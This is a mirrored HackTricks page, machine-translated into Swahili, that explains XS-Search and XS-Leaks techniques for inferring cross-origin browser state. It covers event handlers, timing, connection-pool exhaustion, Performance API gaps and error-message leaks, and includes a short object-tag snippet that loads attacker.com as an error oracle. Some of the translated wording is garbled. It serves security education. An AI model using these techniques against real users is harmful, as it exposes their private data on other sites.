Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xs-search
History
Translator 23a4d11686 Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA
2024-04-07 03:36:12 +00:00
..
css-injection Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00
connection-pool-by-destination-example.md Translated to Swahili 2024-02-11 02:13:58 +00:00
connection-pool-example.md Translated to Swahili 2024-02-11 02:13:58 +00:00
cookie-bomb-+-onerror-xs-leak.md Translated to Swahili 2024-02-11 02:13:58 +00:00
event-loop-blocking-+-lazy-images.md Translated to Swahili 2024-02-11 02:13:58 +00:00
javascript-execution-xs-leak.md Translated to Swahili 2024-02-11 02:13:58 +00:00
performance.now-+-force-heavy-task.md Translated to Swahili 2024-02-11 02:13:58 +00:00
performance.now-example.md Translated to Swahili 2024-02-11 02:13:58 +00:00
README.md Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 03:36:12 +00:00
url-max-length-client-side.md Translated to Swahili 2024-02-11 02:13:58 +00:00

README.md

XS-Search/XS-Leaks

Tumia Trickest kujenga na kutumia workflows kwa urahisi zinazotumia zana za jamii ya juu zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Taarifa Msingi

XS-Search ni njia inayotumika kwa kuchimba taarifa za msalaba-mwanzo kwa kutumia mapungufu ya njia ya pembeni.

Vipengele muhimu vinavyohusika katika shambulio hili ni:

  • Tovuti Isiyolindwa: Tovuti ya lengo ambayo taarifa inakusudiwa kuchimbuliwa.
  • Tovuti ya Mshambuliaji: Tovuti mbaya iliyoanzishwa na mshambuliaji, ambayo muathiriwa anatembelea, ikimiliki shambulio.
  • Mbinu ya Kuingiza: Mbinu inayotumiwa kuingiza Tovuti Isiyolindwa katika Tovuti ya Mshambuliaji (k.m., window.open, iframe, fetch, tag ya HTML na href, n.k.).
  • Mbinu ya Kuvuja: Mbinu zinazotumika kutofautisha tofauti katika hali ya Tovuti Isiyolindwa kulingana na taarifa iliyokusanywa kupitia mbinu ya kuingiza.
  • Hali: Hali mbili za uwezekano wa Tovuti Isiyolindwa, ambazo mshambuliaji analenga kutofautisha.
  • Tofauti Zinazoweza Kugundulika: Mabadiliko yanayoweza kuonekana ambayo mshambuliaji anategemea kufikiria hali ya Tovuti Isiyolindwa.

Tofauti Zinazoweza Kugundulika

Vipengele kadhaa vinaweza kuchambuliwa kufautisha hali za Tovuti Isiyolindwa:

  • Msimbo wa Hali: Kutofautisha kati ya mimbo tofauti ya hali ya majibu ya HTTP ya msalaba-mwanzo, kama makosa ya seva, makosa ya mteja, au makosa ya uthibitishaji.
  • Matumizi ya API: Kutambua matumizi ya API za Wavuti kwenye kurasa, kufunua ikiwa ukurasa wa msalaba-mwanzo unatumia API maalum ya JavaScript ya Wavuti.
  • Uelekezaji: Kugundua mabadiliko kwenye kurasa tofauti, si tu mwelekeo wa HTTP lakini pia wale uliochochewa na JavaScript au HTML.
  • Yaliyomo kwenye Ukurasa: Kuchunguza mabadiliko katika mwili wa majibu ya HTTP au katika rasilimali ndogo za ukurasa, kama idadi ya fremu zilizojumuishwa au tofauti za ukubwa katika picha.
  • Kichwa cha HTTP: Kuzingatia uwepo au labda thamani ya kichwa maalum cha majibu ya HTTP, ikiwa ni pamoja na vichwa kama X-Frame-Options, Content-Disposition, na Cross-Origin-Resource-Policy.
  • Wakati: Kugundua tofauti za wakati kati ya hali mbili.

Mbinu za Kuingiza

  • Vipengele vya HTML: HTML inatoa vipengele mbalimbali kwa kuingiza rasilimali za msalaba-mwanzo, kama vile maandishi ya mtindo, picha, au hati, ikilazimisha kivinjari kuomba rasilimali isiyo ya HTML. Orodha ya vipengele vya HTML vinavyoweza kutumika kwa kusudi hili inaweza kupatikana kwenye https://github.com/cure53/HTTPLeaks.
  • Fremu: Vipengele kama iframe, object, na embed vinaweza kuingiza rasilimali za HTML moja kwa moja kwenye ukurasa wa mshambuliaji. Ikiwa ukurasa haujamilindwa na fremu, JavaScript inaweza kufikia mali ya fremu iliyoframewa kupitia mali ya contentWindow.
  • Pop-ups: Mbinu ya window.open inafungua rasilimali kwenye kichupo kipya au dirisha, ikitoa kushughulikia dirisha kwa JavaScript kuingiliana na mbinu na mali zinazofuata SOP. Pop-ups, mara nyingi hutumika katika kuingia moja, hupuuza ulinzi wa fremu na vizuizi vya vidakuzi vya rasilimali ya lengo. Hata hivyo, vivinjari vya kisasa vinaizuia kujenga pop-up kwa hatua fulani za mtumiaji.
  • Maombi ya JavaScript: JavaScript inaruhusu maombi moja kwa moja kwa rasilimali za lengo kwa kutumia XMLHttpRequests au Fetch API. Mbinu hizi hutoa udhibiti sahihi juu ya ombi, kama kuchagua kufuata mwelekeo wa HTTP.

Mbinu za Kuvuja

  • Mfumo wa Tukio: Mbinu ya kuvuja ya kawaida katika XS-Leaks, ambapo wachakataji wa tukio kama onload na onerror hutoa ufahamu kuhusu mafanikio au kushindwa kwa kupakia rasilimali.
  • Ujumbe wa Makosa: Mifano ya JavaScript au kurasa maalum za makosa zinaweza kutoa taarifa ya kuvuja moja kwa moja kutoka kwa ujumbe wa makosa au kwa kutofautisha kati ya uwepo wake na kutokuwepo kwake.
  • Vikwazo vya Kimataifa: Vikwazo vya kimwili vya kivinjari, kama uwezo wa kumbukumbu au vikwazo vingine vilivyowekwa na kivinjari, vinaweza kuashiria wakati kizingiti kinapofikiwa, kikitumika kama mbinu ya kuvuja.
  • Hali ya Kimataifa: Mwingiliano unaoweza kugundulika na hali za kimataifa za vivinjari (k.m., kiolesura cha Historia) unaweza kutumiwa. Kwa mfano, idadi ya vipengele katika historia ya kivinjari inaweza kutoa viashiria kuhusu kurasa za msalaba-mwanzo.
  • API ya Utendaji: API hii hutoa maelezo ya utendaji wa ukurasa wa sasa, ikiwa ni pamoja na wakati wa mtandao kwa hati na rasilimali zilizopakiwa, kuruhusu uchambuzi kuhusu rasilimali zilizoombwa.
  • Mali Zinazoweza Kusomwa: Baadhi ya sifa za HTML ni zinazoweza kusomwa msalaba-mwanzo na zinaweza kutumika kama mbinu ya kuvuja. Kwa mfano, mali ya window.frame.length inaruhusu JavaScript kuhesabu fremu zilizojumuishwa kwenye ukurasa wa wavuti msalaba-mwanzo.

Zana ya XSinator & Karatasi

XSinator ni zana ya moja kwa moja ya kuangalia vivinjari dhidi ya XS-Leaks kadhaa zinazojulikana zilizoainishwa katika karatasi yake: https://xsinator.com/paper.pdf

Unaweza kupata zana hiyo kwenye https://xsinator.com/

{% hint style="warning" %} XS-Leaks Zilizotengwa: Tulilazimika kutenga XS-Leaks zinazotegemea wafanyakazi wa huduma kwani wangeweza kuingilia kati na uvujaji mwingine katika XSinator. Zaidi, tulichagua kutenga XS-Leaks zinazotegemea mipangilio mibovu na kasoro katika programu-jalizi ya wavuti maalum. Kwa mfano, mipangilio mibovu ya Kushirikiana Rasilimali za Asili (CORS), uvujaji wa ujumbe wa posta au Udukuzi wa Kuvuka-Tovuti. Aidha, tulitenga XS-Leaks zinazotegemea wakati kwani mara nyingi hupata ugumu wa kuwa polepole, kelele, na kutokuwa sahihi. {% endhint %}


Tumia Trickest kujenga na kutumia workflows kwa urahisi zinazotumia zana za jamii ya juu zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Mbinu za Muda

Baadhi ya mbinu zifuatazo zitatumia muda kama sehemu ya mchakato wa kugundua tofauti katika hali zinazowezekana za kurasa za wavuti. Kuna njia tofauti za kupima muda katika kivinjari cha wavuti.

Saa: API ya performance.now() inaruhusu watengenezaji kupata vipimo vya muda vya azimio kubwa.
Kuna idadi kubwa ya APIs ambazo wachambuzi wanaweza kutumia vibaya kujenga saa za kimya: Broadcast Channel API, Message Channel API, requestAnimationFrame, setTimeout, michoro ya CSS, na zingine.
Kwa habari zaidi: https://xsleaks.dev/docs/attacks/timing-attacks/clocks.

Mbinu za Msimamizi wa Matukio

Onload/Onerror

{% content-ref url="cookie-bomb-+-onerror-xs-leak.md" %} cookie-bomb-+-onerror-xs-leak.md {% endcontent-ref %}

Mfano wa kodi unajaribu kupakia vitu vya skripti kutoka JS, lakini vitambulisho vingine kama vitu, maandishi ya mtindo, picha, sauti pia vinaweza kutumika. Zaidi ya hayo, pia inawezekana kuingiza lebo moja kwa moja na kutangaza matukio ya onload na onerror ndani ya lebo (badala ya kuingiza kutoka JS).

Pia kuna toleo lisilo na skripti la shambulio hili:

<object data="//example.com/404">
<object data="//attacker.com/?error"></object>
</object>

Katika kesi hii ikiwa example.com/404 haipatikani attacker.com/?error itapakiwa.

Wakati wa Kupakia

{% content-ref url="performance.now-example.md" %} performance.now-example.md {% endcontent-ref %}

Wakati wa Kupakia + Kazi Kubwa Iliyolazimishwa

Mbinu hii ni kama ile ya awali, lakini mshambuliaji pia atalazimisha hatua fulani ichukue muda muhimu wakati jibu ni chanya au hasi na kupima muda huo.

{% content-ref url="performance.now-+-force-heavy-task.md" %} performance.now-+-force-heavy-task.md {% endcontent-ref %}

Wakati wa Kutopakia/Kabla ya Kutopakia

Muda unaochukuliwa kupakua rasilimali unaweza kupimwa kwa kutumia matukio ya unload na beforeunload. Tukio la beforeunload hutokea wakati kivinjari kinapojiandaa kwenda kwenye ukurasa mpya, wakati unload tukio hutokea wakati uhamisho unafanyika kwa kweli. Tofauti ya muda kati ya matukio haya mawili inaweza kuhesabiwa kujua muda ambao kivinjari kilitumia kupakua rasilimali.

Wakati wa Fremu Iliyofungwa + kupakia

Imeonekana kwamba bila Kinga za Fremu, muda unaohitajika kwa ukurasa na rasilimali zake kujipakia kwenye mtandao unaweza kupimwa na mshambuliaji. Kipimo hiki kawaida kinawezekana kwa sababu kivinjari cha onload cha fremu kinachochomwa tu baada ya kukamilika kwa upakiaji wa rasilimali na utekelezaji wa JavaScript. Ili kuepuka mabadiliko yaliyoletwa na utekelezaji wa script, mshambuliaji anaweza kutumia sifa ya sandbox ndani ya <iframe>. Kuingiza sifa hii kunazuia kazi nyingi, hasa utekelezaji wa JavaScript, hivyo kurahisisha kipimo kinachotawaliwa zaidi na utendaji wa mtandao.

// Example of an iframe with the sandbox attribute
<iframe src="example.html" sandbox></iframe>

#ID + kosa + onload

  • Njia za Uingizaji: Fremu
  • Tofauti Inayoweza Kugundulika: Yaliyomo kwenye Ukurasa
  • Maelezo Zaidi:
  • Muhtasari: Ikiwa unaweza kufanya ukurasa upate kosa wakati yaliyomo sahihi inapatawa na kufanya ipakie kwa usahihi wakati wowote yaliyomo inapatawa, basi unaweza kufanya mzunguko wa kutoa taarifa zote bila kupima muda.
  • Mfano wa Kanuni:

Fikiria unaweza kuweka ukurasa una yaliyomo ya siri ndani ya Iframe.

Unaweza kufanya mhanga atafute faili inayoitwa "flag" kwa kutumia Iframe (kwa mfano kwa kutumia CSRF). Ndani ya Iframe unajua kwamba tukio la onload litatekelezwa angalau mara moja daima. Kisha, unaweza badilisha URL ya iframe lakini kubadilisha tu yaliyomo ya hash ndani ya URL.

Kwa mfano:

  1. URL1: www.attacker.com/xssearch#jaribu1
  2. URL2: www.attacker.com/xssearch#jaribu2

Ikiwa URL ya kwanza ilipakia kwa mafanikio, basi, wakati kubadilisha sehemu ya hash ya URL tukio la onload halitazinduliwa tena. Lakini ikiwa ukurasa ulikuwa na aina fulani ya kosa wakati wa upakiaji, basi, tukio la onload litazinduliwa tena.

Kisha, unaweza kutofautisha kati ya ukurasa uliopakiwa kwa usahihi au ukurasa ambao una kosa wakati unapopatikana.

Utekelezaji wa Javascript

  • Njia za Uingizaji: Fremu
  • Tofauti Inayoweza Kugundulika: Yaliyomo kwenye Ukurasa
  • Maelezo Zaidi:
  • Muhtasari: Ikiwa ukurasa unarudisha yaliyomo nyeti, au yaliyomo ambayo inaweza kudhibitiwa na mtumiaji. Mtumiaji anaweza kuweka msimbo wa JS sahihi katika kesi hasi, na kila jaribio kila wakati ndani ya <script> tags, hivyo katika kesi hasi wahalifu wa mtandao mimba ni utekelezwa, na katika kesi ya aina hakuna kitu kitatekelezwa.
  • Mfano wa Kanuni:

{% content-ref url="javascript-execution-xs-leak.md" %} javascript-execution-xs-leak.md {% endcontent-ref %}

CORB - Onerror

  • Njia za Uingizaji: Vipengele vya HTML
  • Tofauti Inayoweza Kugundulika: Msimbo wa Hali & Vichwa vya habari
  • Maelezo Zaidi: https://xsleaks.dev/docs/attacks/browser-features/corb/
  • Muhtasari: Kuzuia Kusoma wa Msalaba wa Asili (CORB) ni hatua ya usalama inayozuia kurasa za wavuti kupakia rasilimali fulani nyeti za msalaba wa asili kulinda dhidi ya mashambulizi kama Spectre. Walakini, wahalifu wa mtandao wanaweza kutumia tabia yake ya kinga. Wakati majibu yanayostahili CORB yanarudisha Aina ya Yaliyomo iliyolindwa na CORB Content-Type na nosniff na msimbo wa hali wa 2xx, CORB inaondoa mwili na vichwa vya majibu. Wahalifu wanaoangalia hii wanaweza kufikiria mchanganyiko wa msimbo wa hali (ukiashiria mafanikio au kosa) na Content-Type (ukiashiria ikiwa inalindwa na CORB), ikiongoza kwa uwezekano wa kuvuja kwa taarifa.
  • Mfano wa Kanuni:

Angalia kiungo cha maelezo zaidi kwa maelezo zaidi kuhusu shambulio.

onblur

Inawezekana kupakia ukurasa ndani ya iframe na kutumia #id_value kufanya ukurasa jikite kwenye kipengele cha iframe kilichotajwa, kisha iki ishara ya onblur inazinduliwa, kipengele cha ID kipo.
Unaweza kufanya shambulio sawa na portal tags.

Matangazo ya postMessage

  • Njia za Uingizaji: Fremu, Vipengele vya Pop-up
  • Tofauti Inayoweza Kugundulika: Matumizi ya API
  • Maelezo Zaidi: https://xsleaks.dev/docs/attacks/postmessage-broadcasts/
  • Muhtasari: Kusanya taarifa nyeti kutoka kwa postMessage au kutumia uwepo wa postMessages kama oracle kujua hali ya mtumiaji kwenye ukurasa
  • Mfano wa Kanuni: Msimbo wowote unaoisikiliza postMessages zote.

Programu mara nyingi hutumia matangazo ya postMessage kwa mawasiliano kati ya asili tofauti. Walakini, njia hii inaweza kwa bahati mbaya kufunua taarifa nyeti ikiwa parameter ya targetOrigin haijatajwa ipasavyo, kuruhusu dirisha lolote kupokea ujumbe. Zaidi ya hayo, kupokea ujumbe kunaweza kutenda kama oracle; kwa mfano, ujumbe fulani unaweza kutumwa tu kwa watumiaji walioingia. Kwa hivyo, uwepo au kutokuwepo kwa ujumbe huu unaweza kufunua taarifa kuhusu hali au utambulisho wa mtumiaji, kama vile ikiwa wamehakikiwa au la.

Tumia Trickest kujenga na kutumia taratibu kwa urahisi zinazotumia zana za jamii za juu zaidi duniani.
Pata Ufikiaji Leo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Mbinu za Vizuizi vya Kimataifa

WebSocket API

Inawezekana kutambua ikiwa, na ni ngapi, WebSocket connections ukurasa wa lengo unatumia. Inaruhusu mhalifu kugundua hali za programu na kufichua taarifa zinazohusiana na idadi ya uhusiano wa WebSocket.

Ikiwa asili inatumia idadi kubwa ya vitu vya uhusiano wa WebSocket, bila kujali hali zao za uhusiano, uumbaji wa vitu vipya utasababisha mizizi ya JavaScript. Ili kutekeleza shambulio hili, tovuti ya mhalifu inafungua tovuti ya lengo katika pop-up au iframe na kisha, baada ya wavuti ya lengo imepakia, inajaribu kuunda idadi kubwa ya uhusiano wa WebSocket inayowezekana. Idadi ya mizizi iliyorushwa ni idadi ya uhusiano wa WebSocket uliotumiwa na dirisha la wavuti ya lengo.

API ya Malipo

XS-Leak hii inamwezesha mshambuliaji kugundua wakati ukurasa wa asili unapoanzisha ombi la malipo.

Kwa sababu ombi moja la malipo tu linaweza kuwa hai kwa wakati mmoja, ikiwa tovuti ya lengo inatumia API ya Ombi la Malipo, jaribio lolote la kuonyesha matumizi ya API hii zaidi litashindwa, na kusababisha kosa la JavaScript. Mshambuliaji anaweza kutumia hili kwa kujaribu mara kwa mara kuonyesha UI ya API ya Malipo. Ikiwa jaribio moja linasababisha kosa, tovuti ya lengo inaitumia kwa sasa. Mshambuliaji anaweza kuficha majaribio haya ya mara kwa mara kwa kufunga UI mara moja baada ya kuunda.

Kupima Mzunguko wa Tukio

{% content-ref url="event-loop-blocking-+-lazy-images.md" %} event-loop-blocking-+-lazy-images.md {% endcontent-ref %}

JavaScript inafanya kazi kwenye mfano wa mzunguko wa tukio lenye wima moja, ikimaanisha kwamba inaweza kutekeleza kazi moja kwa wakati mmoja. Tabia hii inaweza kutumiwa kwa kupima muda gani wa kutekeleza kanuni kutoka asili tofauti. Mshambuliaji anaweza kupima muda wa utekelezaji wa kanuni yao wenyewe kwenye mzunguko wa tukio kwa kuendelea kutuma matukio na mali zilizowekwa. Matukio haya yatasindika wakati dimbwi la matukio linapokuwa tupu. Ikiwa asili zingine pia zinatuma matukio kwenye dimbwi sawa, mshambuliaji anaweza kufikiria muda unachukua matukio ya nje kutekelezwa kwa kusimamia kucheleweshwa kwa utekelezaji wa kazi zao wenyewe. Mbinu hii ya kufuatilia mzunguko wa tukio kwa kuchelewesha inaweza kufunua muda wa utekelezaji wa kanuni kutoka asili tofauti, ikifichua habari nyeti.

{% hint style="warning" %} Katika kupima muda wa utekelezaji, inawezekana kufuta faktori za mtandao ili kupata vipimo sahihi zaidi. Kwa mfano, kwa kupakia rasilimali zinazotumiwa na ukurasa kabla ya kuiweka. {% endhint %}

Mzunguko wa Tukio Ulio na Shughuli nyingi

  • Njia za Kuingiza:

  • Tofauti Inayoweza Kugundulika: Kupima Wakati (kwa ujumla kutokana na Yaliyomo kwenye Ukurasa, Nambari ya Hali)

  • Maelezo Zaidi: https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop

  • Muhtasari: Mbinu moja ya kupima muda wa utekelezaji wa shughuli ya wavuti inajumuisha kuzuia kwa makusudi mzunguko wa tukio la wima na kisha kupima muda unachochukua mzunguko wa tukio kuwa upatikane tena. Kwa kuingiza shughuli ya kuzuia (kama hesabu ndefu au wito wa API wa moja kwa moja) kwenye mzunguko wa tukio, na kufuatilia muda unachochukua kwa kanuni inayofuata kuanza utekelezaji, mtu anaweza kufikiria muda wa kazi zilizokuwa zikitekelezwa kwenye mzunguko wa tukio wakati wa kipindi cha kuzuia. Mbinu hii inatumia asili moja ya mzunguko wa tukio la JavaScript, ambapo kazi zinatekelezwa kwa mpangilio, na inaweza kutoa ufahamu juu ya utendaji au tabia ya shughuli zingine zinazoshiriki mchakato huo.

  • Mfano wa Kanuni:

Faida kubwa ya mbinu ya kupima muda wa utekelezaji kwa kufunga mzunguko wa tukio ni uwezo wake wa kuzunguka Kizuizi cha Tovuti. Kizuizi cha Tovuti ni kipengele cha usalama kinachotenganisha tovuti tofauti katika michakato tofauti, lengo likiwa kuzuia tovuti zenye nia mbaya kufikia moja kwa moja data nyeti kutoka kwa tovuti nyingine. Hata hivyo, kwa kuathiri muda wa utekelezaji wa asili nyingine kupitia mzunguko wa tukio ulioshirikiwa, mshambuliaji anaweza kutoa habari kwa njia isiyo ya moja kwa moja kuhusu shughuli za asili hiyo. Mbinu hii haitegemei ufikiaji wa moja kwa moja wa data ya asili nyingine bali inaangalia athari ya shughuli za asili hiyo kwenye mzunguko wa tukio ulioshirikiwa, hivyo kuepuka vizuizi vya kinga vilivyowekwa na Kizuizi cha Tovuti.

{% hint style="warning" %} Katika kupima muda wa utekelezaji, inawezekana kufuta faktori za mtandao ili kupata vipimo sahihi zaidi. Kwa mfano, kwa kupakia rasilimali zinazotumiwa na ukurasa kabla ya kuiweka. {% endhint %}

Dimbwi la Uunganisho

  • Njia za Kuingiza: Maombi ya JavaScript
  • Tofauti Inayoweza Kugundulika: Kupima Wakati (kwa ujumla kutokana na Yaliyomo kwenye Ukurasa, Nambari ya Hali)
  • Maelezo Zaidi: https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/
  • Muhtasari: Mshambuliaji anaweza kufunga soketi zote isipokuwa 1, kupakia wavuti ya lengo na wakati huo huo kupakia ukurasa mwingine, muda mpaka ukurasa wa mwisho uanze kupakia ni muda ulioutumia ukurasa wa lengo kupakia.
  • Mfano wa Kanuni:

{% content-ref url="connection-pool-example.md" %} connection-pool-example.md {% endcontent-ref %}

Vivinjari hutumia soketi kwa mawasiliano na seva, lakini kutokana na rasilimali zilizopunguzwa za mfumo wa uendeshaji na vifaa, vivinjari wanalazimika kuweka kikomo kwenye idadi ya soketi zinazoweza kuwa wazi wakati mmoja. Wachambuzi wanaweza kutumia udhaifu huu kupitia hatua zifuatazo:

  1. Kuthibitisha kikomo cha soketi cha kivinjari, kwa mfano, soketi 256 za ulimwengu.
  2. Kuchukua soketi 255 kwa muda mrefu kwa kuanzisha maombi 255 kwa wenyeji mbalimbali, yaliyoundwa kudumisha mawasiliano wazi bila kukamilika.
  3. Kutumia soketi ya 256 kutuma ombi kwa ukurasa wa lengo.
  4. Jaribu ombi la 257 kwa mwenyeji tofauti. Kwa kuwa soketi zote zinatumika (kulingana na hatua 2 na 3), ombi hili litawekwa kwenye foleni hadi soketi iweze kupatikana. Kuchelewesha kabla ya ombi hili kuendelea hutoa mshambuliaji habari ya wakati kuhusu shughuli za mtandao zinazohusiana na soketi ya 256 (soketi ya ukurasa wa lengo). Ufahamu huu unawezekana kwa sababu soketi 255 kutoka hatua 2 bado zinatumika, ikimaanisha soketi yoyote inayopatikana mpya lazima iwe ile iliyotolewa kutoka hatua 3. Muda uliochukuliwa kwa soketi ya 256 kuwa inapatikana moja kwa moja unahusishwa na muda uliohitajika kwa ombi kwa ukurasa wa lengo kukamilika.

Kwa maelezo zaidi: https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/

Mbinu za API ya Utendaji

API ya Utendaji hutoa ufahamu kuhusu vipimo vya utendaji wa maombi ya wavuti, ukiboreshwa zaidi na API ya Ufuatiliaji wa Rasilmali. API ya Ufuatiliaji wa Rasilmali inawezesha ufuatiliaji wa nyakati za maombi ya mtandao kwa undani, kama vile muda wa maombi. Hasa, wakati seva zinajumuisha kichwa cha Timing-Allow-Origin: * katika majibu yao, data ziada kama ukubwa wa uhamisho na muda wa kutafuta kikoa inapatikana.

Hii wingi wa data inaweza kupatikana kupitia njia kama performance.getEntries au performance.getEntriesByName, ikitoa mtazamo wa kina wa habari zinazohusiana na utendaji. Zaidi ya hayo, API hii inawezesha kupima nyakati za utekelezaji kwa kuhesabu tofauti kati ya alama za wakati zilizopatikana kutoka kwa performance.now(). Hata hivyo, ni muhimu kutambua kwamba kwa baadhi ya operesheni katika vivinjari kama Chrome, usahihi wa performance.now() unaweza kuwa mdogo hadi milisekunde, ambayo inaweza kuathiri ufanisi wa vipimo vya wakati.

Zaidi ya vipimo vya wakati, API ya Utendaji inaweza kutumika kwa ufahamu unaohusiana na usalama. Kwa mfano, uwepo au kutokuwepo kwa kurasa katika kitu cha utendaji katika Chrome kunaweza kuashiria matumizi ya X-Frame-Options. Hasa, ikiwa ukurasa umefungwa kutorejea kwenye fremu kutokana na X-Frame-Options, hautarekodiwa katika kitu cha utendaji, kutoa ishara ndogo kuhusu sera za urekebishaji wa ukurasa.

Kuvuja kwa Hitilafu

Inawezekana kutofautisha kati ya kodi za hali ya majibu ya HTTP kwa sababu maombi yanayosababisha hitilafu hayatengenezi kuingia ya utendaji.

Kosa la Upya wa Mtindo

Katika mbinu iliyopita pia iligunduliwa matukio mawili ambapo kasoro za kivinjari katika GC husababisha rasilmali kupakiwa mara mbili wanaposhindwa kupakiwa. Hii itasababisha kuingia nyingi katika API ya Utendaji na hivyo inaweza kugunduliwa.

Kosa la Kufusisha Ombi

Mbinu hii ilipatikana kwenye jedwali katika karatasi iliyotajwa lakini hakukuwa na maelezo ya mbinu hiyo. Hata hivyo, unaweza kupata msimbo wa chanzo ukikagua hilo katika https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak

Kuvuja kwa Ukurasa Tasa

Mshambuliaji anaweza kugundua ikiwa ombi limeleta mwili wa majibu wa HTTP ulio tasa kwa sababu kurasa tasa hazitengenezi kuingia ya utendaji katika baadhi ya vivinjari.

Kuvuja kwa XSS-Auditor

Katika Uthibitishaji wa Usalama (SA), XSS Auditor, awali iliyokusudiwa kuzuia mashambulizi ya Kuvuka-Tovuti (XSS), inaweza kwa kushangaza kutumika kuvuja taarifa nyeti. Ingawa kipengele hiki kilichojengwa kimeondolewa kutoka Google Chrome (GC), bado ipo katika SA. Mwaka 2013, Braun na Heiderich walidhihirisha kuwa XSS Auditor inaweza kwa bahati mbaya kuzuia skripti halali, ikisababisha matokeo sahihi ya uwongo. Kujenga juu ya hili, watafiti waliendeleza mbinu za kutoa taarifa na kugundua yaliyomo maalum kwenye kurasa za asili tofauti, dhana inayoitwa XS-Leaks, iliripotiwa awali na Terada na kufafanuliwa na Heyes katika chapisho la blogu. Ingawa mbinu hizi zilikuwa maalum kwa XSS Auditor katika GC, iligundulika kwamba katika SA, kurasa zilizozuiliwa na XSS Auditor hazizalishi kuingia katika API ya Utendaji, kufunua njia ambayo taarifa nyeti bado inaweza kuvuja.

Kuvuja kwa X-Frame

Ikiwa ukurasa haikubali kurejeshwa kwenye fremu haitatengeneza kuingia ya utendaji. Kama matokeo, mshambuliaji anaweza kugundua kichwa cha majibu X-Frame-Options.
Hali kama hiyo hutokea ikiwa unatumia tag ya kujumlisha.

Uchunguzi wa Upakuaji

Kama ilivyoelezwa katika XS-Leak, rasilmali inayopakuliwa kwa sababu ya kichwa cha ContentDisposition, pia haitengenezi kuingia ya utendaji. Mbinu hii inafanya kazi katika vivinjari vyote vikuu.

Kuanza Kuelekeza Kuvuja

Tulipata kisa kimoja cha XS-Leak kinachotumia tabia ya baadhi ya vivinjari ambavyo hurekodi habari nyingi sana kwa maombi ya asili tofauti. Kiwango kinadefini sehemu ya sifa ambazo zinapaswa kuwekwa kama sifuri kwa rasilimali za asili tofauti. Hata hivyo, katika SA inawezekana kugundua ikiwa mtumiaji ameelekezwa na ukurasa lengwa, kwa kuuliza API ya Utendaji na kuangalia data ya wakati wa kuelekeza kuanza.

Kuelekeza Kuvuja Kwa Muda

Katika GC, muda wa maombi ambayo matokeo yake ni kuelekeza ni hasi na hivyo inaweza kutofautishwa na maombi ambayo hayasababishi kuelekeza.

Kuvuja kwa CORP

Katika baadhi ya kesi, kuingia cha nextHopProtocol kinaweza kutumika kama mbinu ya kuvuja. Katika GC, wakati kichwa cha CORP kinawekwa, nextHopProtocol itakuwa tupu. Tafadhali kumbuka kuwa SA haitaumba kuingizo cha utendaji kabisa kwa rasilimali zilizo na CORP.

Mfanyakazi wa Huduma

Mafanyakazi wa huduma ni muktadha wa skripti ulioendeshwa na matukio ambao hufanya kazi kwa asili. Hufanya kazi nyuma ya ukurasa wa wavuti na wanaweza kuingilia, kubadilisha, na kukusanya rasilimali ili kuunda programu ya wavuti ya nje ya mtandao.
Ikiwa rasilimali iliyohifadhiwa na mfanyakazi wa huduma inaingiwa kupitia fremu, rasilimali itapakiwa kutoka kwa akiba ya mfanyakazi wa huduma.
Ili kugundua ikiwa rasilimali ilipakiwa kutoka kwa akiba ya mfanyakazi wa huduma, API ya Utendaji inaweza kutumika.
Hii pia inaweza kufanywa na shambulio la Wakti (angalia karatasi kwa maelezo zaidi).

Akiba

Kwa kutumia API ya Utendaji inawezekana kuchunguza ikiwa rasilimali imehifadhiwa kwenye akiba.

Muda wa Mtandao

Mbinu ya Ujumbe wa Hitilafu

Hitilafu ya Vyombo vya Habari

// Code saved here in case it dissapear from the link
// Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
window.addEventListener("load", startup, false);
function displayErrorMessage(msg) {
document.getElementById("log").innerHTML += msg;
}

function startup() {
let audioElement = document.getElementById("audio");
// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
document.getElementById("startTest").addEventListener("click", function() {
audioElement.src = document.getElementById("testUrl").value;
}, false);
// Create the event handler
var errHandler = function() {
let err = this.error;
let message = err.message;
let status = "";

// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
// Firefox error.message when the request loads successfully: "Failed to init decoder"
if((message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1) || (message.indexOf("Failed to init decoder") != -1)){
status = "Success";
}else{
status = "Error";
}
displayErrorMessage("<strong>Status: " + status + "</strong> (Error code:" + err.code + " / Error Message: " + err.message + ")<br>");
};
audioElement.onerror = errHandler;
}

Kosa la CORS

Mbinu hii inamwezesha muhusika wa kudukua kuchimbua marudio ya tovuti ya mwelekeo wa msalaba kwa kudukua jinsi vivinjari vilivyotengenezwa na Webkit vinavyoshughulikia maombi ya CORS. Hasa, wakati maombi yaliyoruhusiwa na CORS yanatumwa kwa tovuti ya lengo ambayo inatoa mwelekeo kulingana na hali ya mtumiaji na kivinjari kisha kukataa maombi, URL kamili ya lengo la mwelekeo inafunuliwa ndani ya ujumbe wa kosa. Udhaifu huu si tu unafunua ukweli wa mwelekeo lakini pia unafichua mwisho wa mwelekeo na paramita za utafutaji zenye hisia inaweza kuwa nayo.

Kosa la SRI

